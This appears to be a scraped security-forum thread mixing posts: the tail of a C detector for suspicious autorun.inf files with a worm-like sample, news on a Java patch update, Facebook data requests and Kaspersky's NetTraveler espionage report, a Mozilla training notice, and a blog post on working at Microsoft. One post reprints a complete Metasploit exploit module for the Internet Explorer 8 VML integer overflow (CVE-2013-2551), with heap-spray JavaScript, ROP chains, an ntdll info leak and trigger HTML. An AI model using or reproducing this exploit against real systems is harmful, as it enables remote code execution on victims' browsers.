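            r->script_or_java = true;
        if (in_list(base, system_names)) r->system_process_name = true;
    }
}

/* Launching through a script host, Java, or a binary carrying a system-process name is suspicious. */
bool autorun_suspicious(const char *text)
{
    struct autorun_report r;
    inspect_autorun(text, &r);
    return r.launch_directives > 0 && (r.script_or_java || r.system_process_name);
}

/* Constructed samples: a renamed java.exe started with the archive as argument, and a plain installer CD. */
const char *const SAMPLE_WORM_INF =
    "[autorun]\r\nopen=winlogon.exe -jar jar_cache1234.tmp\r\nicon=winlogon.exe\r\n";
const char *const SAMPLE_CD_INF =
    "[autorun]\r\nopen=setup.exe\r\nicon=setup.ico\r\nlabel=Product CD\r\n";
```

The CD sample launches a program too, but trips none of the flags, which is the distinction the inspector is meant to draw.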
-
[h=1]Critical Java SE update due Tuesday fixes 40 flaws[/h]
[h=2]And yes, most are remotely exploitable[/h]
By Neil McAllister in San Francisco, 14th June 2013

Thought your Java security woes were behind you? Think again. Oracle is planning to release a Critical Patch Update on Tuesday that affects multiple versions of Java, and it's another doozy.

According to Oracle's security announcement, the patch pack addresses 40 different vulnerabilities. All update levels of Java SE 5, 6, and 7 are affected by the flaws, as are all versions of JavaFX.

Of the 40 bugs, all but three are remotely exploitable over a network without the need for a username or password. Yes, that's bad.

Oracle ranks the severity of its flaws using the Common Vulnerability Scoring System (CVSS), and the top-ranked bug in this particular update rates a 10.0 – the highest possible score.

"Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply Critical Patch Update fixes as soon as possible," the database giant helpfully suggests.

Oracle ordinarily releases Critical Patch Updates four times a year on a set schedule, but this will already be the fourth such update issued in 2013. The first shipped on February 1, but Oracle reissued it later in the month with additional fixes. It also scheduled another, previously unplanned update for April.

Each of those earlier updates contained upward of 40 fixes, and each similarly addressed flaws that rated 10.0 on the CVSS severity scale.

Oracle has not yet disclosed which vulnerabilities will be patched by the June update, but previous Critical Patch Updates have patched vulnerabilities in a wide range of Java APIs and subsystems. These flaws could potentially affect a whole host of Java software and were not limited to programs running via the Java browser plugin, as has been the case with some previous Java exploits.

Oracle plans to release its latest Java SE Critical Patch Update on June 18, 2013. After that, the next update is currently scheduled for October 15. ®

Source: Critical Java SE update due Tuesday fixes 40 flaws • The Register
-
[h=1]Web Developer Security 1.0[/h] Raymond Forbes and I will be presenting Web Developer Security 1.0 on Tuesday, June 18th at 12:15 pm PDT. The training will be held in Mozilla’s Mountain View office and also broadcast online. We will cover a grab bag of proactive security measures Web Developers can take to protect their users and their site. Rather than focusing on how to attack a website, this training focuses on how you can safeguard your website from common threats. Some of the topics we will cover include Content Security Policy, X-Frame-Options, cookie security flags, iframe sandbox, content sanitization, and sensitive data encryption. Deploying these techniques will help protect your users and improve the security of your site. For those of you who are able to come watch the talk in person, there will be Punch & Pie! https://air.mozilla.org/web-security-training/ Sursa: Web Developer Security 1.0 | Mozilla Security Blog
-
[h=1]MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, :ua_minver => "8.0", :ua_maxver => "8.0", :javascript => true, :os_name => OperatingSystems::WINDOWS, :rank => Rank }) def initialize(info={}) super(update_info(info, 'Name' => "MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow", 'Description' => %q{ This module exploits an integer overflow vulnerability on Internet Explorer. The vulnerability exists in the handling of the dashstyle.array length for vml shapes on the vgx.dll module. This module has been tested successfully on Windows 7 SP1 with IE8. It uses the the JRE6 to bypass ASLR by default. In addition a target to use an info leak to disclose the ntdll.dll base address is provided. This target requires ntdll.dll v6.1.7601.17514 (the default dll version on a fresh Windows 7 SP1 installation) or ntdll.dll v6.1.7601.17725 (version installed after apply MS12-001). 
}, 'License' => MSF_LICENSE, 'Author' => [ 'Nicolas Joly', # Vulnerability discovery, PoC and analysis '4B5F5F4B', # PoC 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2013-2551' ], [ 'OSVDB', '91197' ], [ 'BID', '58570' ], [ 'MSB', 'MS13-037' ], [ 'URL', 'http://www.vupen.com/blog/20130522.Advanced_Exploitation_of_IE10_Windows8_Pwn2Own_2013.php' ], [ 'URL', 'http://binvul.com/viewthread.php?tid=311' ] ], 'Payload' => { 'Space' => 948, 'DisableNops' => true, 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 8 on Windows 7 SP1 with JRE ROP', # default { 'Rop' => :jre, 'Offset' => '0x5f4' } ], # requires: # * ntdll.dll v6.1.7601.17514 (fresh W7SP1 installation) # * ntdll.dll v6.1.7601.17725 (MS12-001) [ 'IE 8 on Windows 7 SP1 with ntdll.dll Info Leak', { 'Rop' => :ntdll, 'Offset' => '0x5f4' } ] ], 'Privileged' => false, 'DisclosureDate' => "Mar 06 2013", 'DefaultTarget' => 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) ], self.class) end def exploit @second_stage_url = rand_text_alpha(10) @leak_param = rand_text_alpha(5) super end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' ie = agent.scan(/MSIE (\d)/).flatten[0] || '' ie_name = "IE #{ie}" case nt when '5.1' os_name = 'Windows XP SP3' when '6.0' os_name = 'Windows Vista' when '6.1' os_name = 'Windows 7' end targets.each do |t| if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? 
and t.name.include?(os_name)) print_status("Target selected as: #{t.name}") return t end end return nil end def ie_heap_spray(my_target, p) js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) # Land the payload at 0x0c0c0c0c # For IE 8 js = %Q| var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['Offset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var i=1; i < 0x300; i++) { heap_obj.alloc(block); } | js = heaplib(js, {:noobfu => true}) if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate end return js end def get_ntdll_rop case @ntdll_version when "6.1.7601.17514" stack_pivot = [ @ntdll_base+0x0001578a, # ret # from ntdll @ntdll_base+0x000096c9, # pop ebx # ret # from ntdll @ntdll_base+0x00015789, # xchg eax, esp # ret from ntdll ].pack("V*") ntdll_rop = [ @ntdll_base+0x45F18, # ntdll!ZwProtectVirtualMemory 0x0c0c0c40, # ret to shellcode 0xffffffff, # ProcessHandle 0x0c0c0c34, # ptr to BaseAddress 0x0c0c0c38, # ptr to NumberOfBytesToProtect 0x00000040, # NewAccessProtection 0x0c0c0c3c, # ptr to OldAccessProtection 0x0c0c0c40, # BaseAddress 0x00000400, # NumberOfBytesToProtect 0x41414141 # OldAccessProtection ].pack("V*") return stack_pivot + ntdll_rop when "6.1.7601.17725" stack_pivot = [ @ntdll_base+0x0001579a, # ret # from ntdll @ntdll_base+0x000096c9, # pop ebx # ret # from ntdll @ntdll_base+0x00015799, # xchg eax, esp # ret from ntdll ].pack("V*") ntdll_rop = [ @ntdll_base+0x45F18, # ntdll!ZwProtectVirtualMemory 0x0c0c0c40, # ret to shellcode 0xffffffff, # ProcessHandle 0x0c0c0c34, # ptr to BaseAddress 0x0c0c0c38, # ptr to 
NumberOfBytesToProtect 0x00000040, # NewAccessProtection 0x0c0c0c3c, # ptr to OldAccessProtection 0x0c0c0c40, # BaseAddress 0x00000400, # NumberOfBytesToProtect 0x41414141 # OldAccessProtection ].pack("V*") return stack_pivot + ntdll_rop else return "" end end def get_payload(t, cli) code = payload.encoded # No rop. Just return the payload. return code if t['Rop'].nil? # Both ROP chains generated by mona.py - See corelan.be case t['Rop'] when :jre print_status("Using JRE ROP") stack_pivot = [ 0x7c348b06, # ret # from msvcr71 0x7c341748, # pop ebx # ret # from msvcr71 0x7c348b05 # xchg eax, esp # ret from msvcr71 ].pack("V*") rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot}) when :ntdll print_status("Using ntdll ROP") rop_payload = get_ntdll_rop + payload.encoded end return rop_payload end def load_exploit_html(my_target, cli) p = get_payload(my_target, cli) js = ie_heap_spray(my_target, p) js_trigger = %Q| var rect_array = new Array() var a = new Array() function createRects(){ for(var i=0; i<0x1000; i++){ rect_array[i] = document.createElement("v:shape") rect_array[i].id = "rect" + i.toString() document.body.appendChild(rect_array[i]) } } function exploit(){ var vml1 = document.getElementById("vml1") for (var i=0; i<0x1000; i++){ a[i] = document.getElementById("rect" + i.toString())._anchorRect; if (i == 0x800) { vml1.dashstyle = "1 2 3 4" } } vml1.dashstyle.array.length = 0 - 1; vml1.dashstyle.array.item(6) = 0x0c0c0c0c; for (var i=0; i<0x1000; i++) { delete a[i]; CollectGarbage(); } location.reload(); } | create_rects_func = "createRects" exploit_func = "exploit" if datastore['OBFUSCATE'] js_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger) js_trigger.obfuscate create_rects_func = js_trigger.sym("createRects") exploit_func = js_trigger.sym("exploit") end html = %Q| <html> <head> <script> #{js} </script> <meta http-equiv="x-ua-compatible" content="IE=EmulateIE9" > </head> <title> </title> <style>v\\: * { behavior:url(#default#VML); 
display:inline-block }</style> <xml:namespace ns="urn:schemas-microsoft-com:vml" prefix="v" /> <script> #{js_trigger} </script> <body onload="#{create_rects_func}(); #{exploit_func}();"> <v:oval> <v:stroke id="vml1"/> </v:oval> </body> </html> | return html end def html_info_leak js_trigger = %Q| var rect_array = new Array() var a = new Array() function createRects(){ for(var i=0; i<0x400; i++){ rect_array[i] = document.createElement("v:shape") rect_array[i].id = "rect" + i.toString() document.body.appendChild(rect_array[i]) } } function exploit(){ var vml1 = document.getElementById("vml1") for (var i=0; i<0x400; i++){ a[i] = document.getElementById("rect" + i.toString())._vgRuntimeStyle; } for (var i=0; i<0x400; i++){ a[i].rotation; if (i == 0x300) { vml1.dashstyle = "1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44" } } var length_orig = vml1.dashstyle.array.length; vml1.dashstyle.array.length = 0 - 1; for (var i=0; i<0x400; i++) { a[i].marginLeft = "a"; marginLeftAddress = vml1.dashstyle.array.item(0x2E+0x16); if (marginLeftAddress > 0) { vml1.dashstyle.array.item(0x2E+0x16) = 0x7ffe0300; var leak = a[i].marginLeft; vml1.dashstyle.array.item(0x2E+0x16) = marginLeftAddress; vml1.dashstyle.array.length = length_orig; document.location = "#{get_resource}/#{@second_stage_url}" + "?#{@leak_param}=" + parseInt( leak.charCodeAt(1).toString(16) + leak.charCodeAt(0).toString(16), 16 ) return; } } } | create_rects_func = "createRects" exploit_func = "exploit" if datastore['OBFUSCATE'] js_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger) js_trigger.obfuscate create_rects_func = js_trigger.sym("createRects") exploit_func = js_trigger.sym("exploit") end html = %Q| <html> <head> <meta http-equiv="x-ua-compatible" content="IE=EmulateIE9" > </head> <title> </title> <style>v\\: * { behavior:url(#default#VML); display:inline-block }</style> <xml:namespace ns="urn:schemas-microsoft-com:vml" prefix="v" /> 
<script> #{js_trigger} </script> <body onload="#{create_rects_func}(); #{exploit_func}();"> <v:oval> <v:stroke id="vml1"/> </v:oval> </body> </html> | return html end def on_request_uri(cli, request) agent = request.headers['User-Agent'] uri = request.uri print_status("Requesting: #{uri}") my_target = get_target(agent) # Avoid the attack if no suitable target found if my_target.nil? print_error("Browser not supported, sending 404: #{agent}") send_not_found(cli) return end if my_target['Rop'] == :ntdll and request.uri !~ /#{@second_stage_url}/ html = html_info_leak html = html.gsub(/^\t\t/, '') print_status("Sending HTML to info leak...") send_response(cli, html, {'Content-Type'=>'text/html'}) else leak = begin request.uri_parts["QueryString"][@leak_param].to_i rescue 0 end if leak == 0 html = load_exploit_html(my_target, cli) html = html.gsub(/^\t\t/, '') print_status("Sending HTML to trigger...") send_response(cli, html, {'Content-Type'=>'text/html'}) return end vprint_status("ntdll leak: 0x#{leak.to_s(16)}") fingerprint = leak & 0x0000ffff case fingerprint when 0x70B0 @ntdll_version = "6.1.7601.17514" @ntdll_base = leak - 0x470B0 when 0x7090 @ntdll_version = "6.1.7601.17725" # MS12-001 @ntdll_base = leak - 0x47090 else print_error("ntdll version not detected, sending 404: #{agent}") send_not_found(cli) return end html = load_exploit_html(my_target, cli) html = html.gsub(/^\t\t/, '') print_status("Sending HTML to trigger...") send_response(cli, html, {'Content-Type'=>'text/html'}) end end end Sursa: MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow
-
[h=2]Facebook Reveals Details of US Data Requests[/h]By AFP on June 15, 2013

WASHINGTON - Facebook revealed Friday it received between 9,000 and 10,000 requests for user data from US authorities in the second half of last year, as it seeks to shield itself from a growing scandal.

The requests covered issues from child disappearances to petty crimes and terror threats and targeted between 18,000 and 19,000 accounts, the social networking site said, without revealing how often it complied with the requests.

Facebook "aggressively" protects its users' data, the company's general counsel Ted Ullyot said in a statement. "We frequently reject such requests outright, or require the government to substantially scale down its requests, or simply give the government much less data than it has requested. And we respond only as required by law," he added.

Facebook is fighting an expanding public backlash after a government contractor revealed it was among nine Internet giants that turned over user data to the secret National Security Agency surveillance program PRISM. The companies, which also include Apple, Google, Microsoft and Yahoo, have denied claims the NSA could directly access their servers. US authorities have said the program helped prevent terror attacks.

Facebook said it was able to report all US national security-related requests, which no company had previously been allowed to do, after pressing the government to release more details about the program. But, for now, it said the government would only allow Facebook to provide the numbers in aggregate form and as a range.

"This is progress, but we're continuing to push for even more transparency, so that our users around the world can understand how infrequently we are asked to provide user data on national security grounds," Ullyot said.

Google asked the FBI and US Justice Department this week for permission to release numbers related to its handing over of data for the leaked surveillance programs, saying it has "nothing to hide." The company's "transparency report" on government requests does not include national security requests under the Foreign Intelligence Surveillance Act (FISA) that authorized PRISM.

In a statement Friday, a Google spokesperson said the company has "always believed it's important to differentiate between different types of government requests," adding that it wants to "publish aggregate numbers of national security requests, including FISA disclosures, separately."

Leaker Edward Snowden, who worked as a subcontractor handling computer networks for the NSA, is in Hong Kong, a semi-autonomous Chinese territory, where he has vowed to contest any possible extradition in court. He also revealed the NSA's gathering of a huge trove of telephone metadata. US authorities said they could not mine the logs to target a specific user without authorization from a secret court.

Source: Facebook Reveals Details of US Data Requests | SecurityWeek.Com
-
[h=1]Kaspersky Lab discovers "Operation NetTraveler", a global cyber-espionage campaign that targeted government organizations and research institutes[/h]

The NetTraveler malware toolkit infected 350 high-profile victims for the purpose of surveillance and data theft.

Bucharest, June 5, 2013 - The Kaspersky Lab expert team has published a new research report on NetTraveler, a family of malware used in Advanced Persistent Threat (APT) operations to successfully compromise more than 350 high-profile victims in 40 different countries. The NetTraveler group infected victims in numerous organizations in both the public and private sectors, including government institutions, embassies, oil and gas companies, research centers, military centers and activist organizations.

According to the Kaspersky Lab report, this threat has been active since 2004, but the largest volume of activity was recorded between 2010 and 2013. The most important areas of interest for the NetTraveler cyber-espionage group recently included space exploration, nanotechnology, energy production, nuclear power, laser technology, medicine and communications.

Infection methods: The attackers infected victims' systems by sending spear-phishing e-mails containing Microsoft Office attachments equipped with two heavily exploited vulnerabilities (CVE-2012-0158 and CVE-2010-3333). Although Microsoft has already released patches for these vulnerabilities, they continue to be widely exploited in targeted attacks and are proving effective. The titles of the malicious attachments in the spear-phishing e-mails reveal the NetTraveler group's efforts to tailor its attacks in order to infect high-profile targets.

Among the titles of the malicious documents are:
Army Cyber Security Policy 2013.doc
Report - Asia Defense Spending Boom.doc
Activity Details.doc
His Holiness the Dalai Lama's visit to Switzerland day 4 Freedom of Speech.doc

Data theft and exfiltration: During the Kaspersky Lab analysis, the expert team obtained infection logs from several NetTraveler command-and-control (C&C) servers. The C&C servers were used to install additional malware on the infected machines and to extract the stolen information. Kaspersky Lab experts estimated the amount of stolen data stored on NetTraveler's command-and-control servers at over 22 gigabytes. The data taken from infected systems included file listings and keystroke logs, as well as other file types such as PDFs, Excel spreadsheets and Word documents. In addition, the NetTraveler toolkit could install an additional backdoor designed for data theft, which could be customized to steal other kinds of sensitive information, such as application configuration details or computer-aided design (CAD) files.

Global infection statistics: According to Kaspersky Lab's analysis of the NetTraveler group's command-and-control servers, there were a total of 350 victims in 40 different countries, including the United States, Canada, the United Kingdom, Russia, Chile, Morocco, Greece, Belgium, Austria, Ukraine, Lithuania, Belarus, Australia, Hong Kong, Japan, China, Mongolia, Iran, Turkey, India, Pakistan, South Korea, Thailand, Qatar, Kazakhstan and Jordan. In addition to analyzing the command-and-control data, Kaspersky Lab experts used Kaspersky Security Network (KSN) to identify additional infection statistics. The top 10 countries by number of victims detected by KSN were Mongolia, followed by Russia, India, Kazakhstan, Kyrgyzstan, China, Tajikistan, South Korea, Spain and Germany.

Additional findings: During Kaspersky Lab's analysis of NetTraveler, the company's experts identified six victims that had been infected by both NetTraveler and Red October, another cyber-espionage operation analyzed by Kaspersky Lab in January 2013. Although no direct link was identified between the NetTraveler attackers and the actors behind Operation Red October, the fact that certain victims were hit by both cyber-espionage campaigns shows that these high-profile victims are targeted by multiple attackers because the information they hold is very valuable.

The full Kaspersky Lab analysis report, including indicators of compromise, remediation techniques and details of the NetTraveler operation with all of its malicious components, is available on Securelist. Kaspersky Lab products detect and neutralize the malicious programs and all versions used by the NetTraveler toolkit, including Trojan-Spy.Win32.TravNet and Downloader.Win32.NetTraveler. Kaspersky Lab products detect the Microsoft Office exploits used in the spear-phishing attacks, including Exploit.MSWord.CVE-2010-333 and Exploit.Win32.CVE-2012-0158.

# # #

About Kaspersky Lab: Kaspersky Lab is the world's largest privately held vendor of endpoint security solutions and is among the top four vendors of endpoint protection solutions worldwide*. Over its 15 years of existence, Kaspersky Lab has remained an innovator in IT security and provides IT protection suites for individual users, SMBs and large enterprises. The company is present in around 200 countries and protects over 300 million users worldwide. For more information, visit www.kaspersky.ro.

Source: Kaspersky Lab discovers "Operation NetTraveler", a global cyber-espionage campaign that targeted government organizations and research institutes | kaspersky.ro
-
"The Trash Can" and "The Most Lame Posts" are not enough, we need one more category: "The Shittiest Posts".
-
[h=1]8 months in Microsoft, I learned these[/h]07. June 2013 by Ahmet Alp Balkan

Two years ago today, I started at Microsoft Windows Azure as an intern, in the very same team I joined right after college and have been working in for the last 8 months. I decided to summarize a few points I have learned so far in this job during the last 8 months. This may sound like the way things work is crappy; it is not. I learned that one will see this sort of problem in all large-scale companies. Most of them are not specific to Microsoft at all. Every company has its own problems. I am not saying that I am unhappy, and I am not complaining. These are purely a few lessons I was not aware of in college (an expectations vs. reality sort of article). Read on:

Expect no documentation in corporations. I have seen that the knowledge inside the company is mostly transferred by talking and hands-on sessions. Some parts of the knowledge base generated are only emailed and not saved anywhere permanent. This is not how information flows in the digital world. There are certain people who, if they got hit by a bus, nobody could pick up their work or code. And it is okay. If this had been my own company there would be tons of wiki pages.

It is not what you do, it is what you sell. You can spend days making your codebase a better place, writing more robust code and fixing others' mistakes. As long as it does not have a big business impact and you can't ship it, it means practically nothing. Nobody will appreciate you for fixing styling or architectural issues in their core; in fact they may get offended. That's not something I realized when I was a student.

Not everybody is passionate about engineering. You don't always work with people passionate about creating wonderful software. Mostly, people have other things to do (e.g. family and kids) and writing better code is not a priority for most. And it is okay. I learned not to expect enthusiasm from everybody.

2-3 hours of coding a day is great. Before taking the job, I was able to code 8-10 hours a day on my personal projects. Somehow in this environment it is almost impossible for me to get 2 hours straight of coding. I spend most of my time trying to figure out how others' uncommented/undocumented code works, debugging strange things and attending daily meetings. Apparently it's not just me, and there can be days when not a single commit is pushed to source control in a team. And it is okay.

Not giving back to the public domain is the norm. I haven't met almost any bloggers or open source developers in my organization dedicating some of their time to give back to the community. Everybody loves finding Stack Overflow answers in search results, but nobody contributes those answers. I can understand that.

The world outside is not well known here. I bet you're reading about what sort of latest technologies and tools are out on blogs, Reddit or Hacker News every day. It's not common here. I am surprised that no one I met in the Windows Azure team has heard about Heroku or Rackspace, which are direct competitors. That's acceptable; not everybody has to know these.

It is all about getting shit done in corporations. If your manager asks for a button there doing that, nobody cares what sort of mess you created. As long as that functionality is ready, it is okay and can always be fixed later. (I haven't seen that ever happen, yet.) In college, I learned that code quality is as important as the result; that turned out to be wrong.

Copy-pasting code can be okay. If somebody sees you doing this outside the corporations, you'll probably get punched in the face. I've seen source files copy-pasted across projects. As long as it gets shit done (described above) no one cares if you produced unmaintainable code.

Code reviews can be skipped, for the sake of agility. It's part of the culture in my team: if you are messing with somebody else's code, you'll send code reviews. Otherwise it is usually not done, and you may wait a lot of time and, after a lot of pings to draw some attention, maybe somebody will respond.

Latest software, meh. Not everybody is fond of the latest versions here. Almost 90% of my colleagues use older versions of Office, Windows, Visual Studio and .NET Framework. There is a common belief that newer versions will break existing workflows. This might be the same reason why some enterprises still run all their software on Java 1.3-1.5. So, I learned not to expect the latest software on environments.

Your specialties usually do not matter. Thousands get hired every year out of college and are usually randomly assigned to a team (which you can't change for 1.5 years). It does not matter whether you have mastered MongoDB, created iOS apps, been an Apache committer, created your own networking library, designed user interfaces or bootstrapped your own startup. You are hired to get something needed done. I was not expecting that. It's hard to find a position in corporations that matches what you love to do. In the end, you are working for your manager's and their managers' paychecks. I was not aware of this fact in college.

(This post made it to the top of Hacker News and /r/programming. Thanks everyone for the comments and support. There are over 1,000 comments on HN, Reddit and below; I did not have a chance to read them all, sorry if I missed yours.)

Source: 8 months in Microsoft, I learned these | /home/alp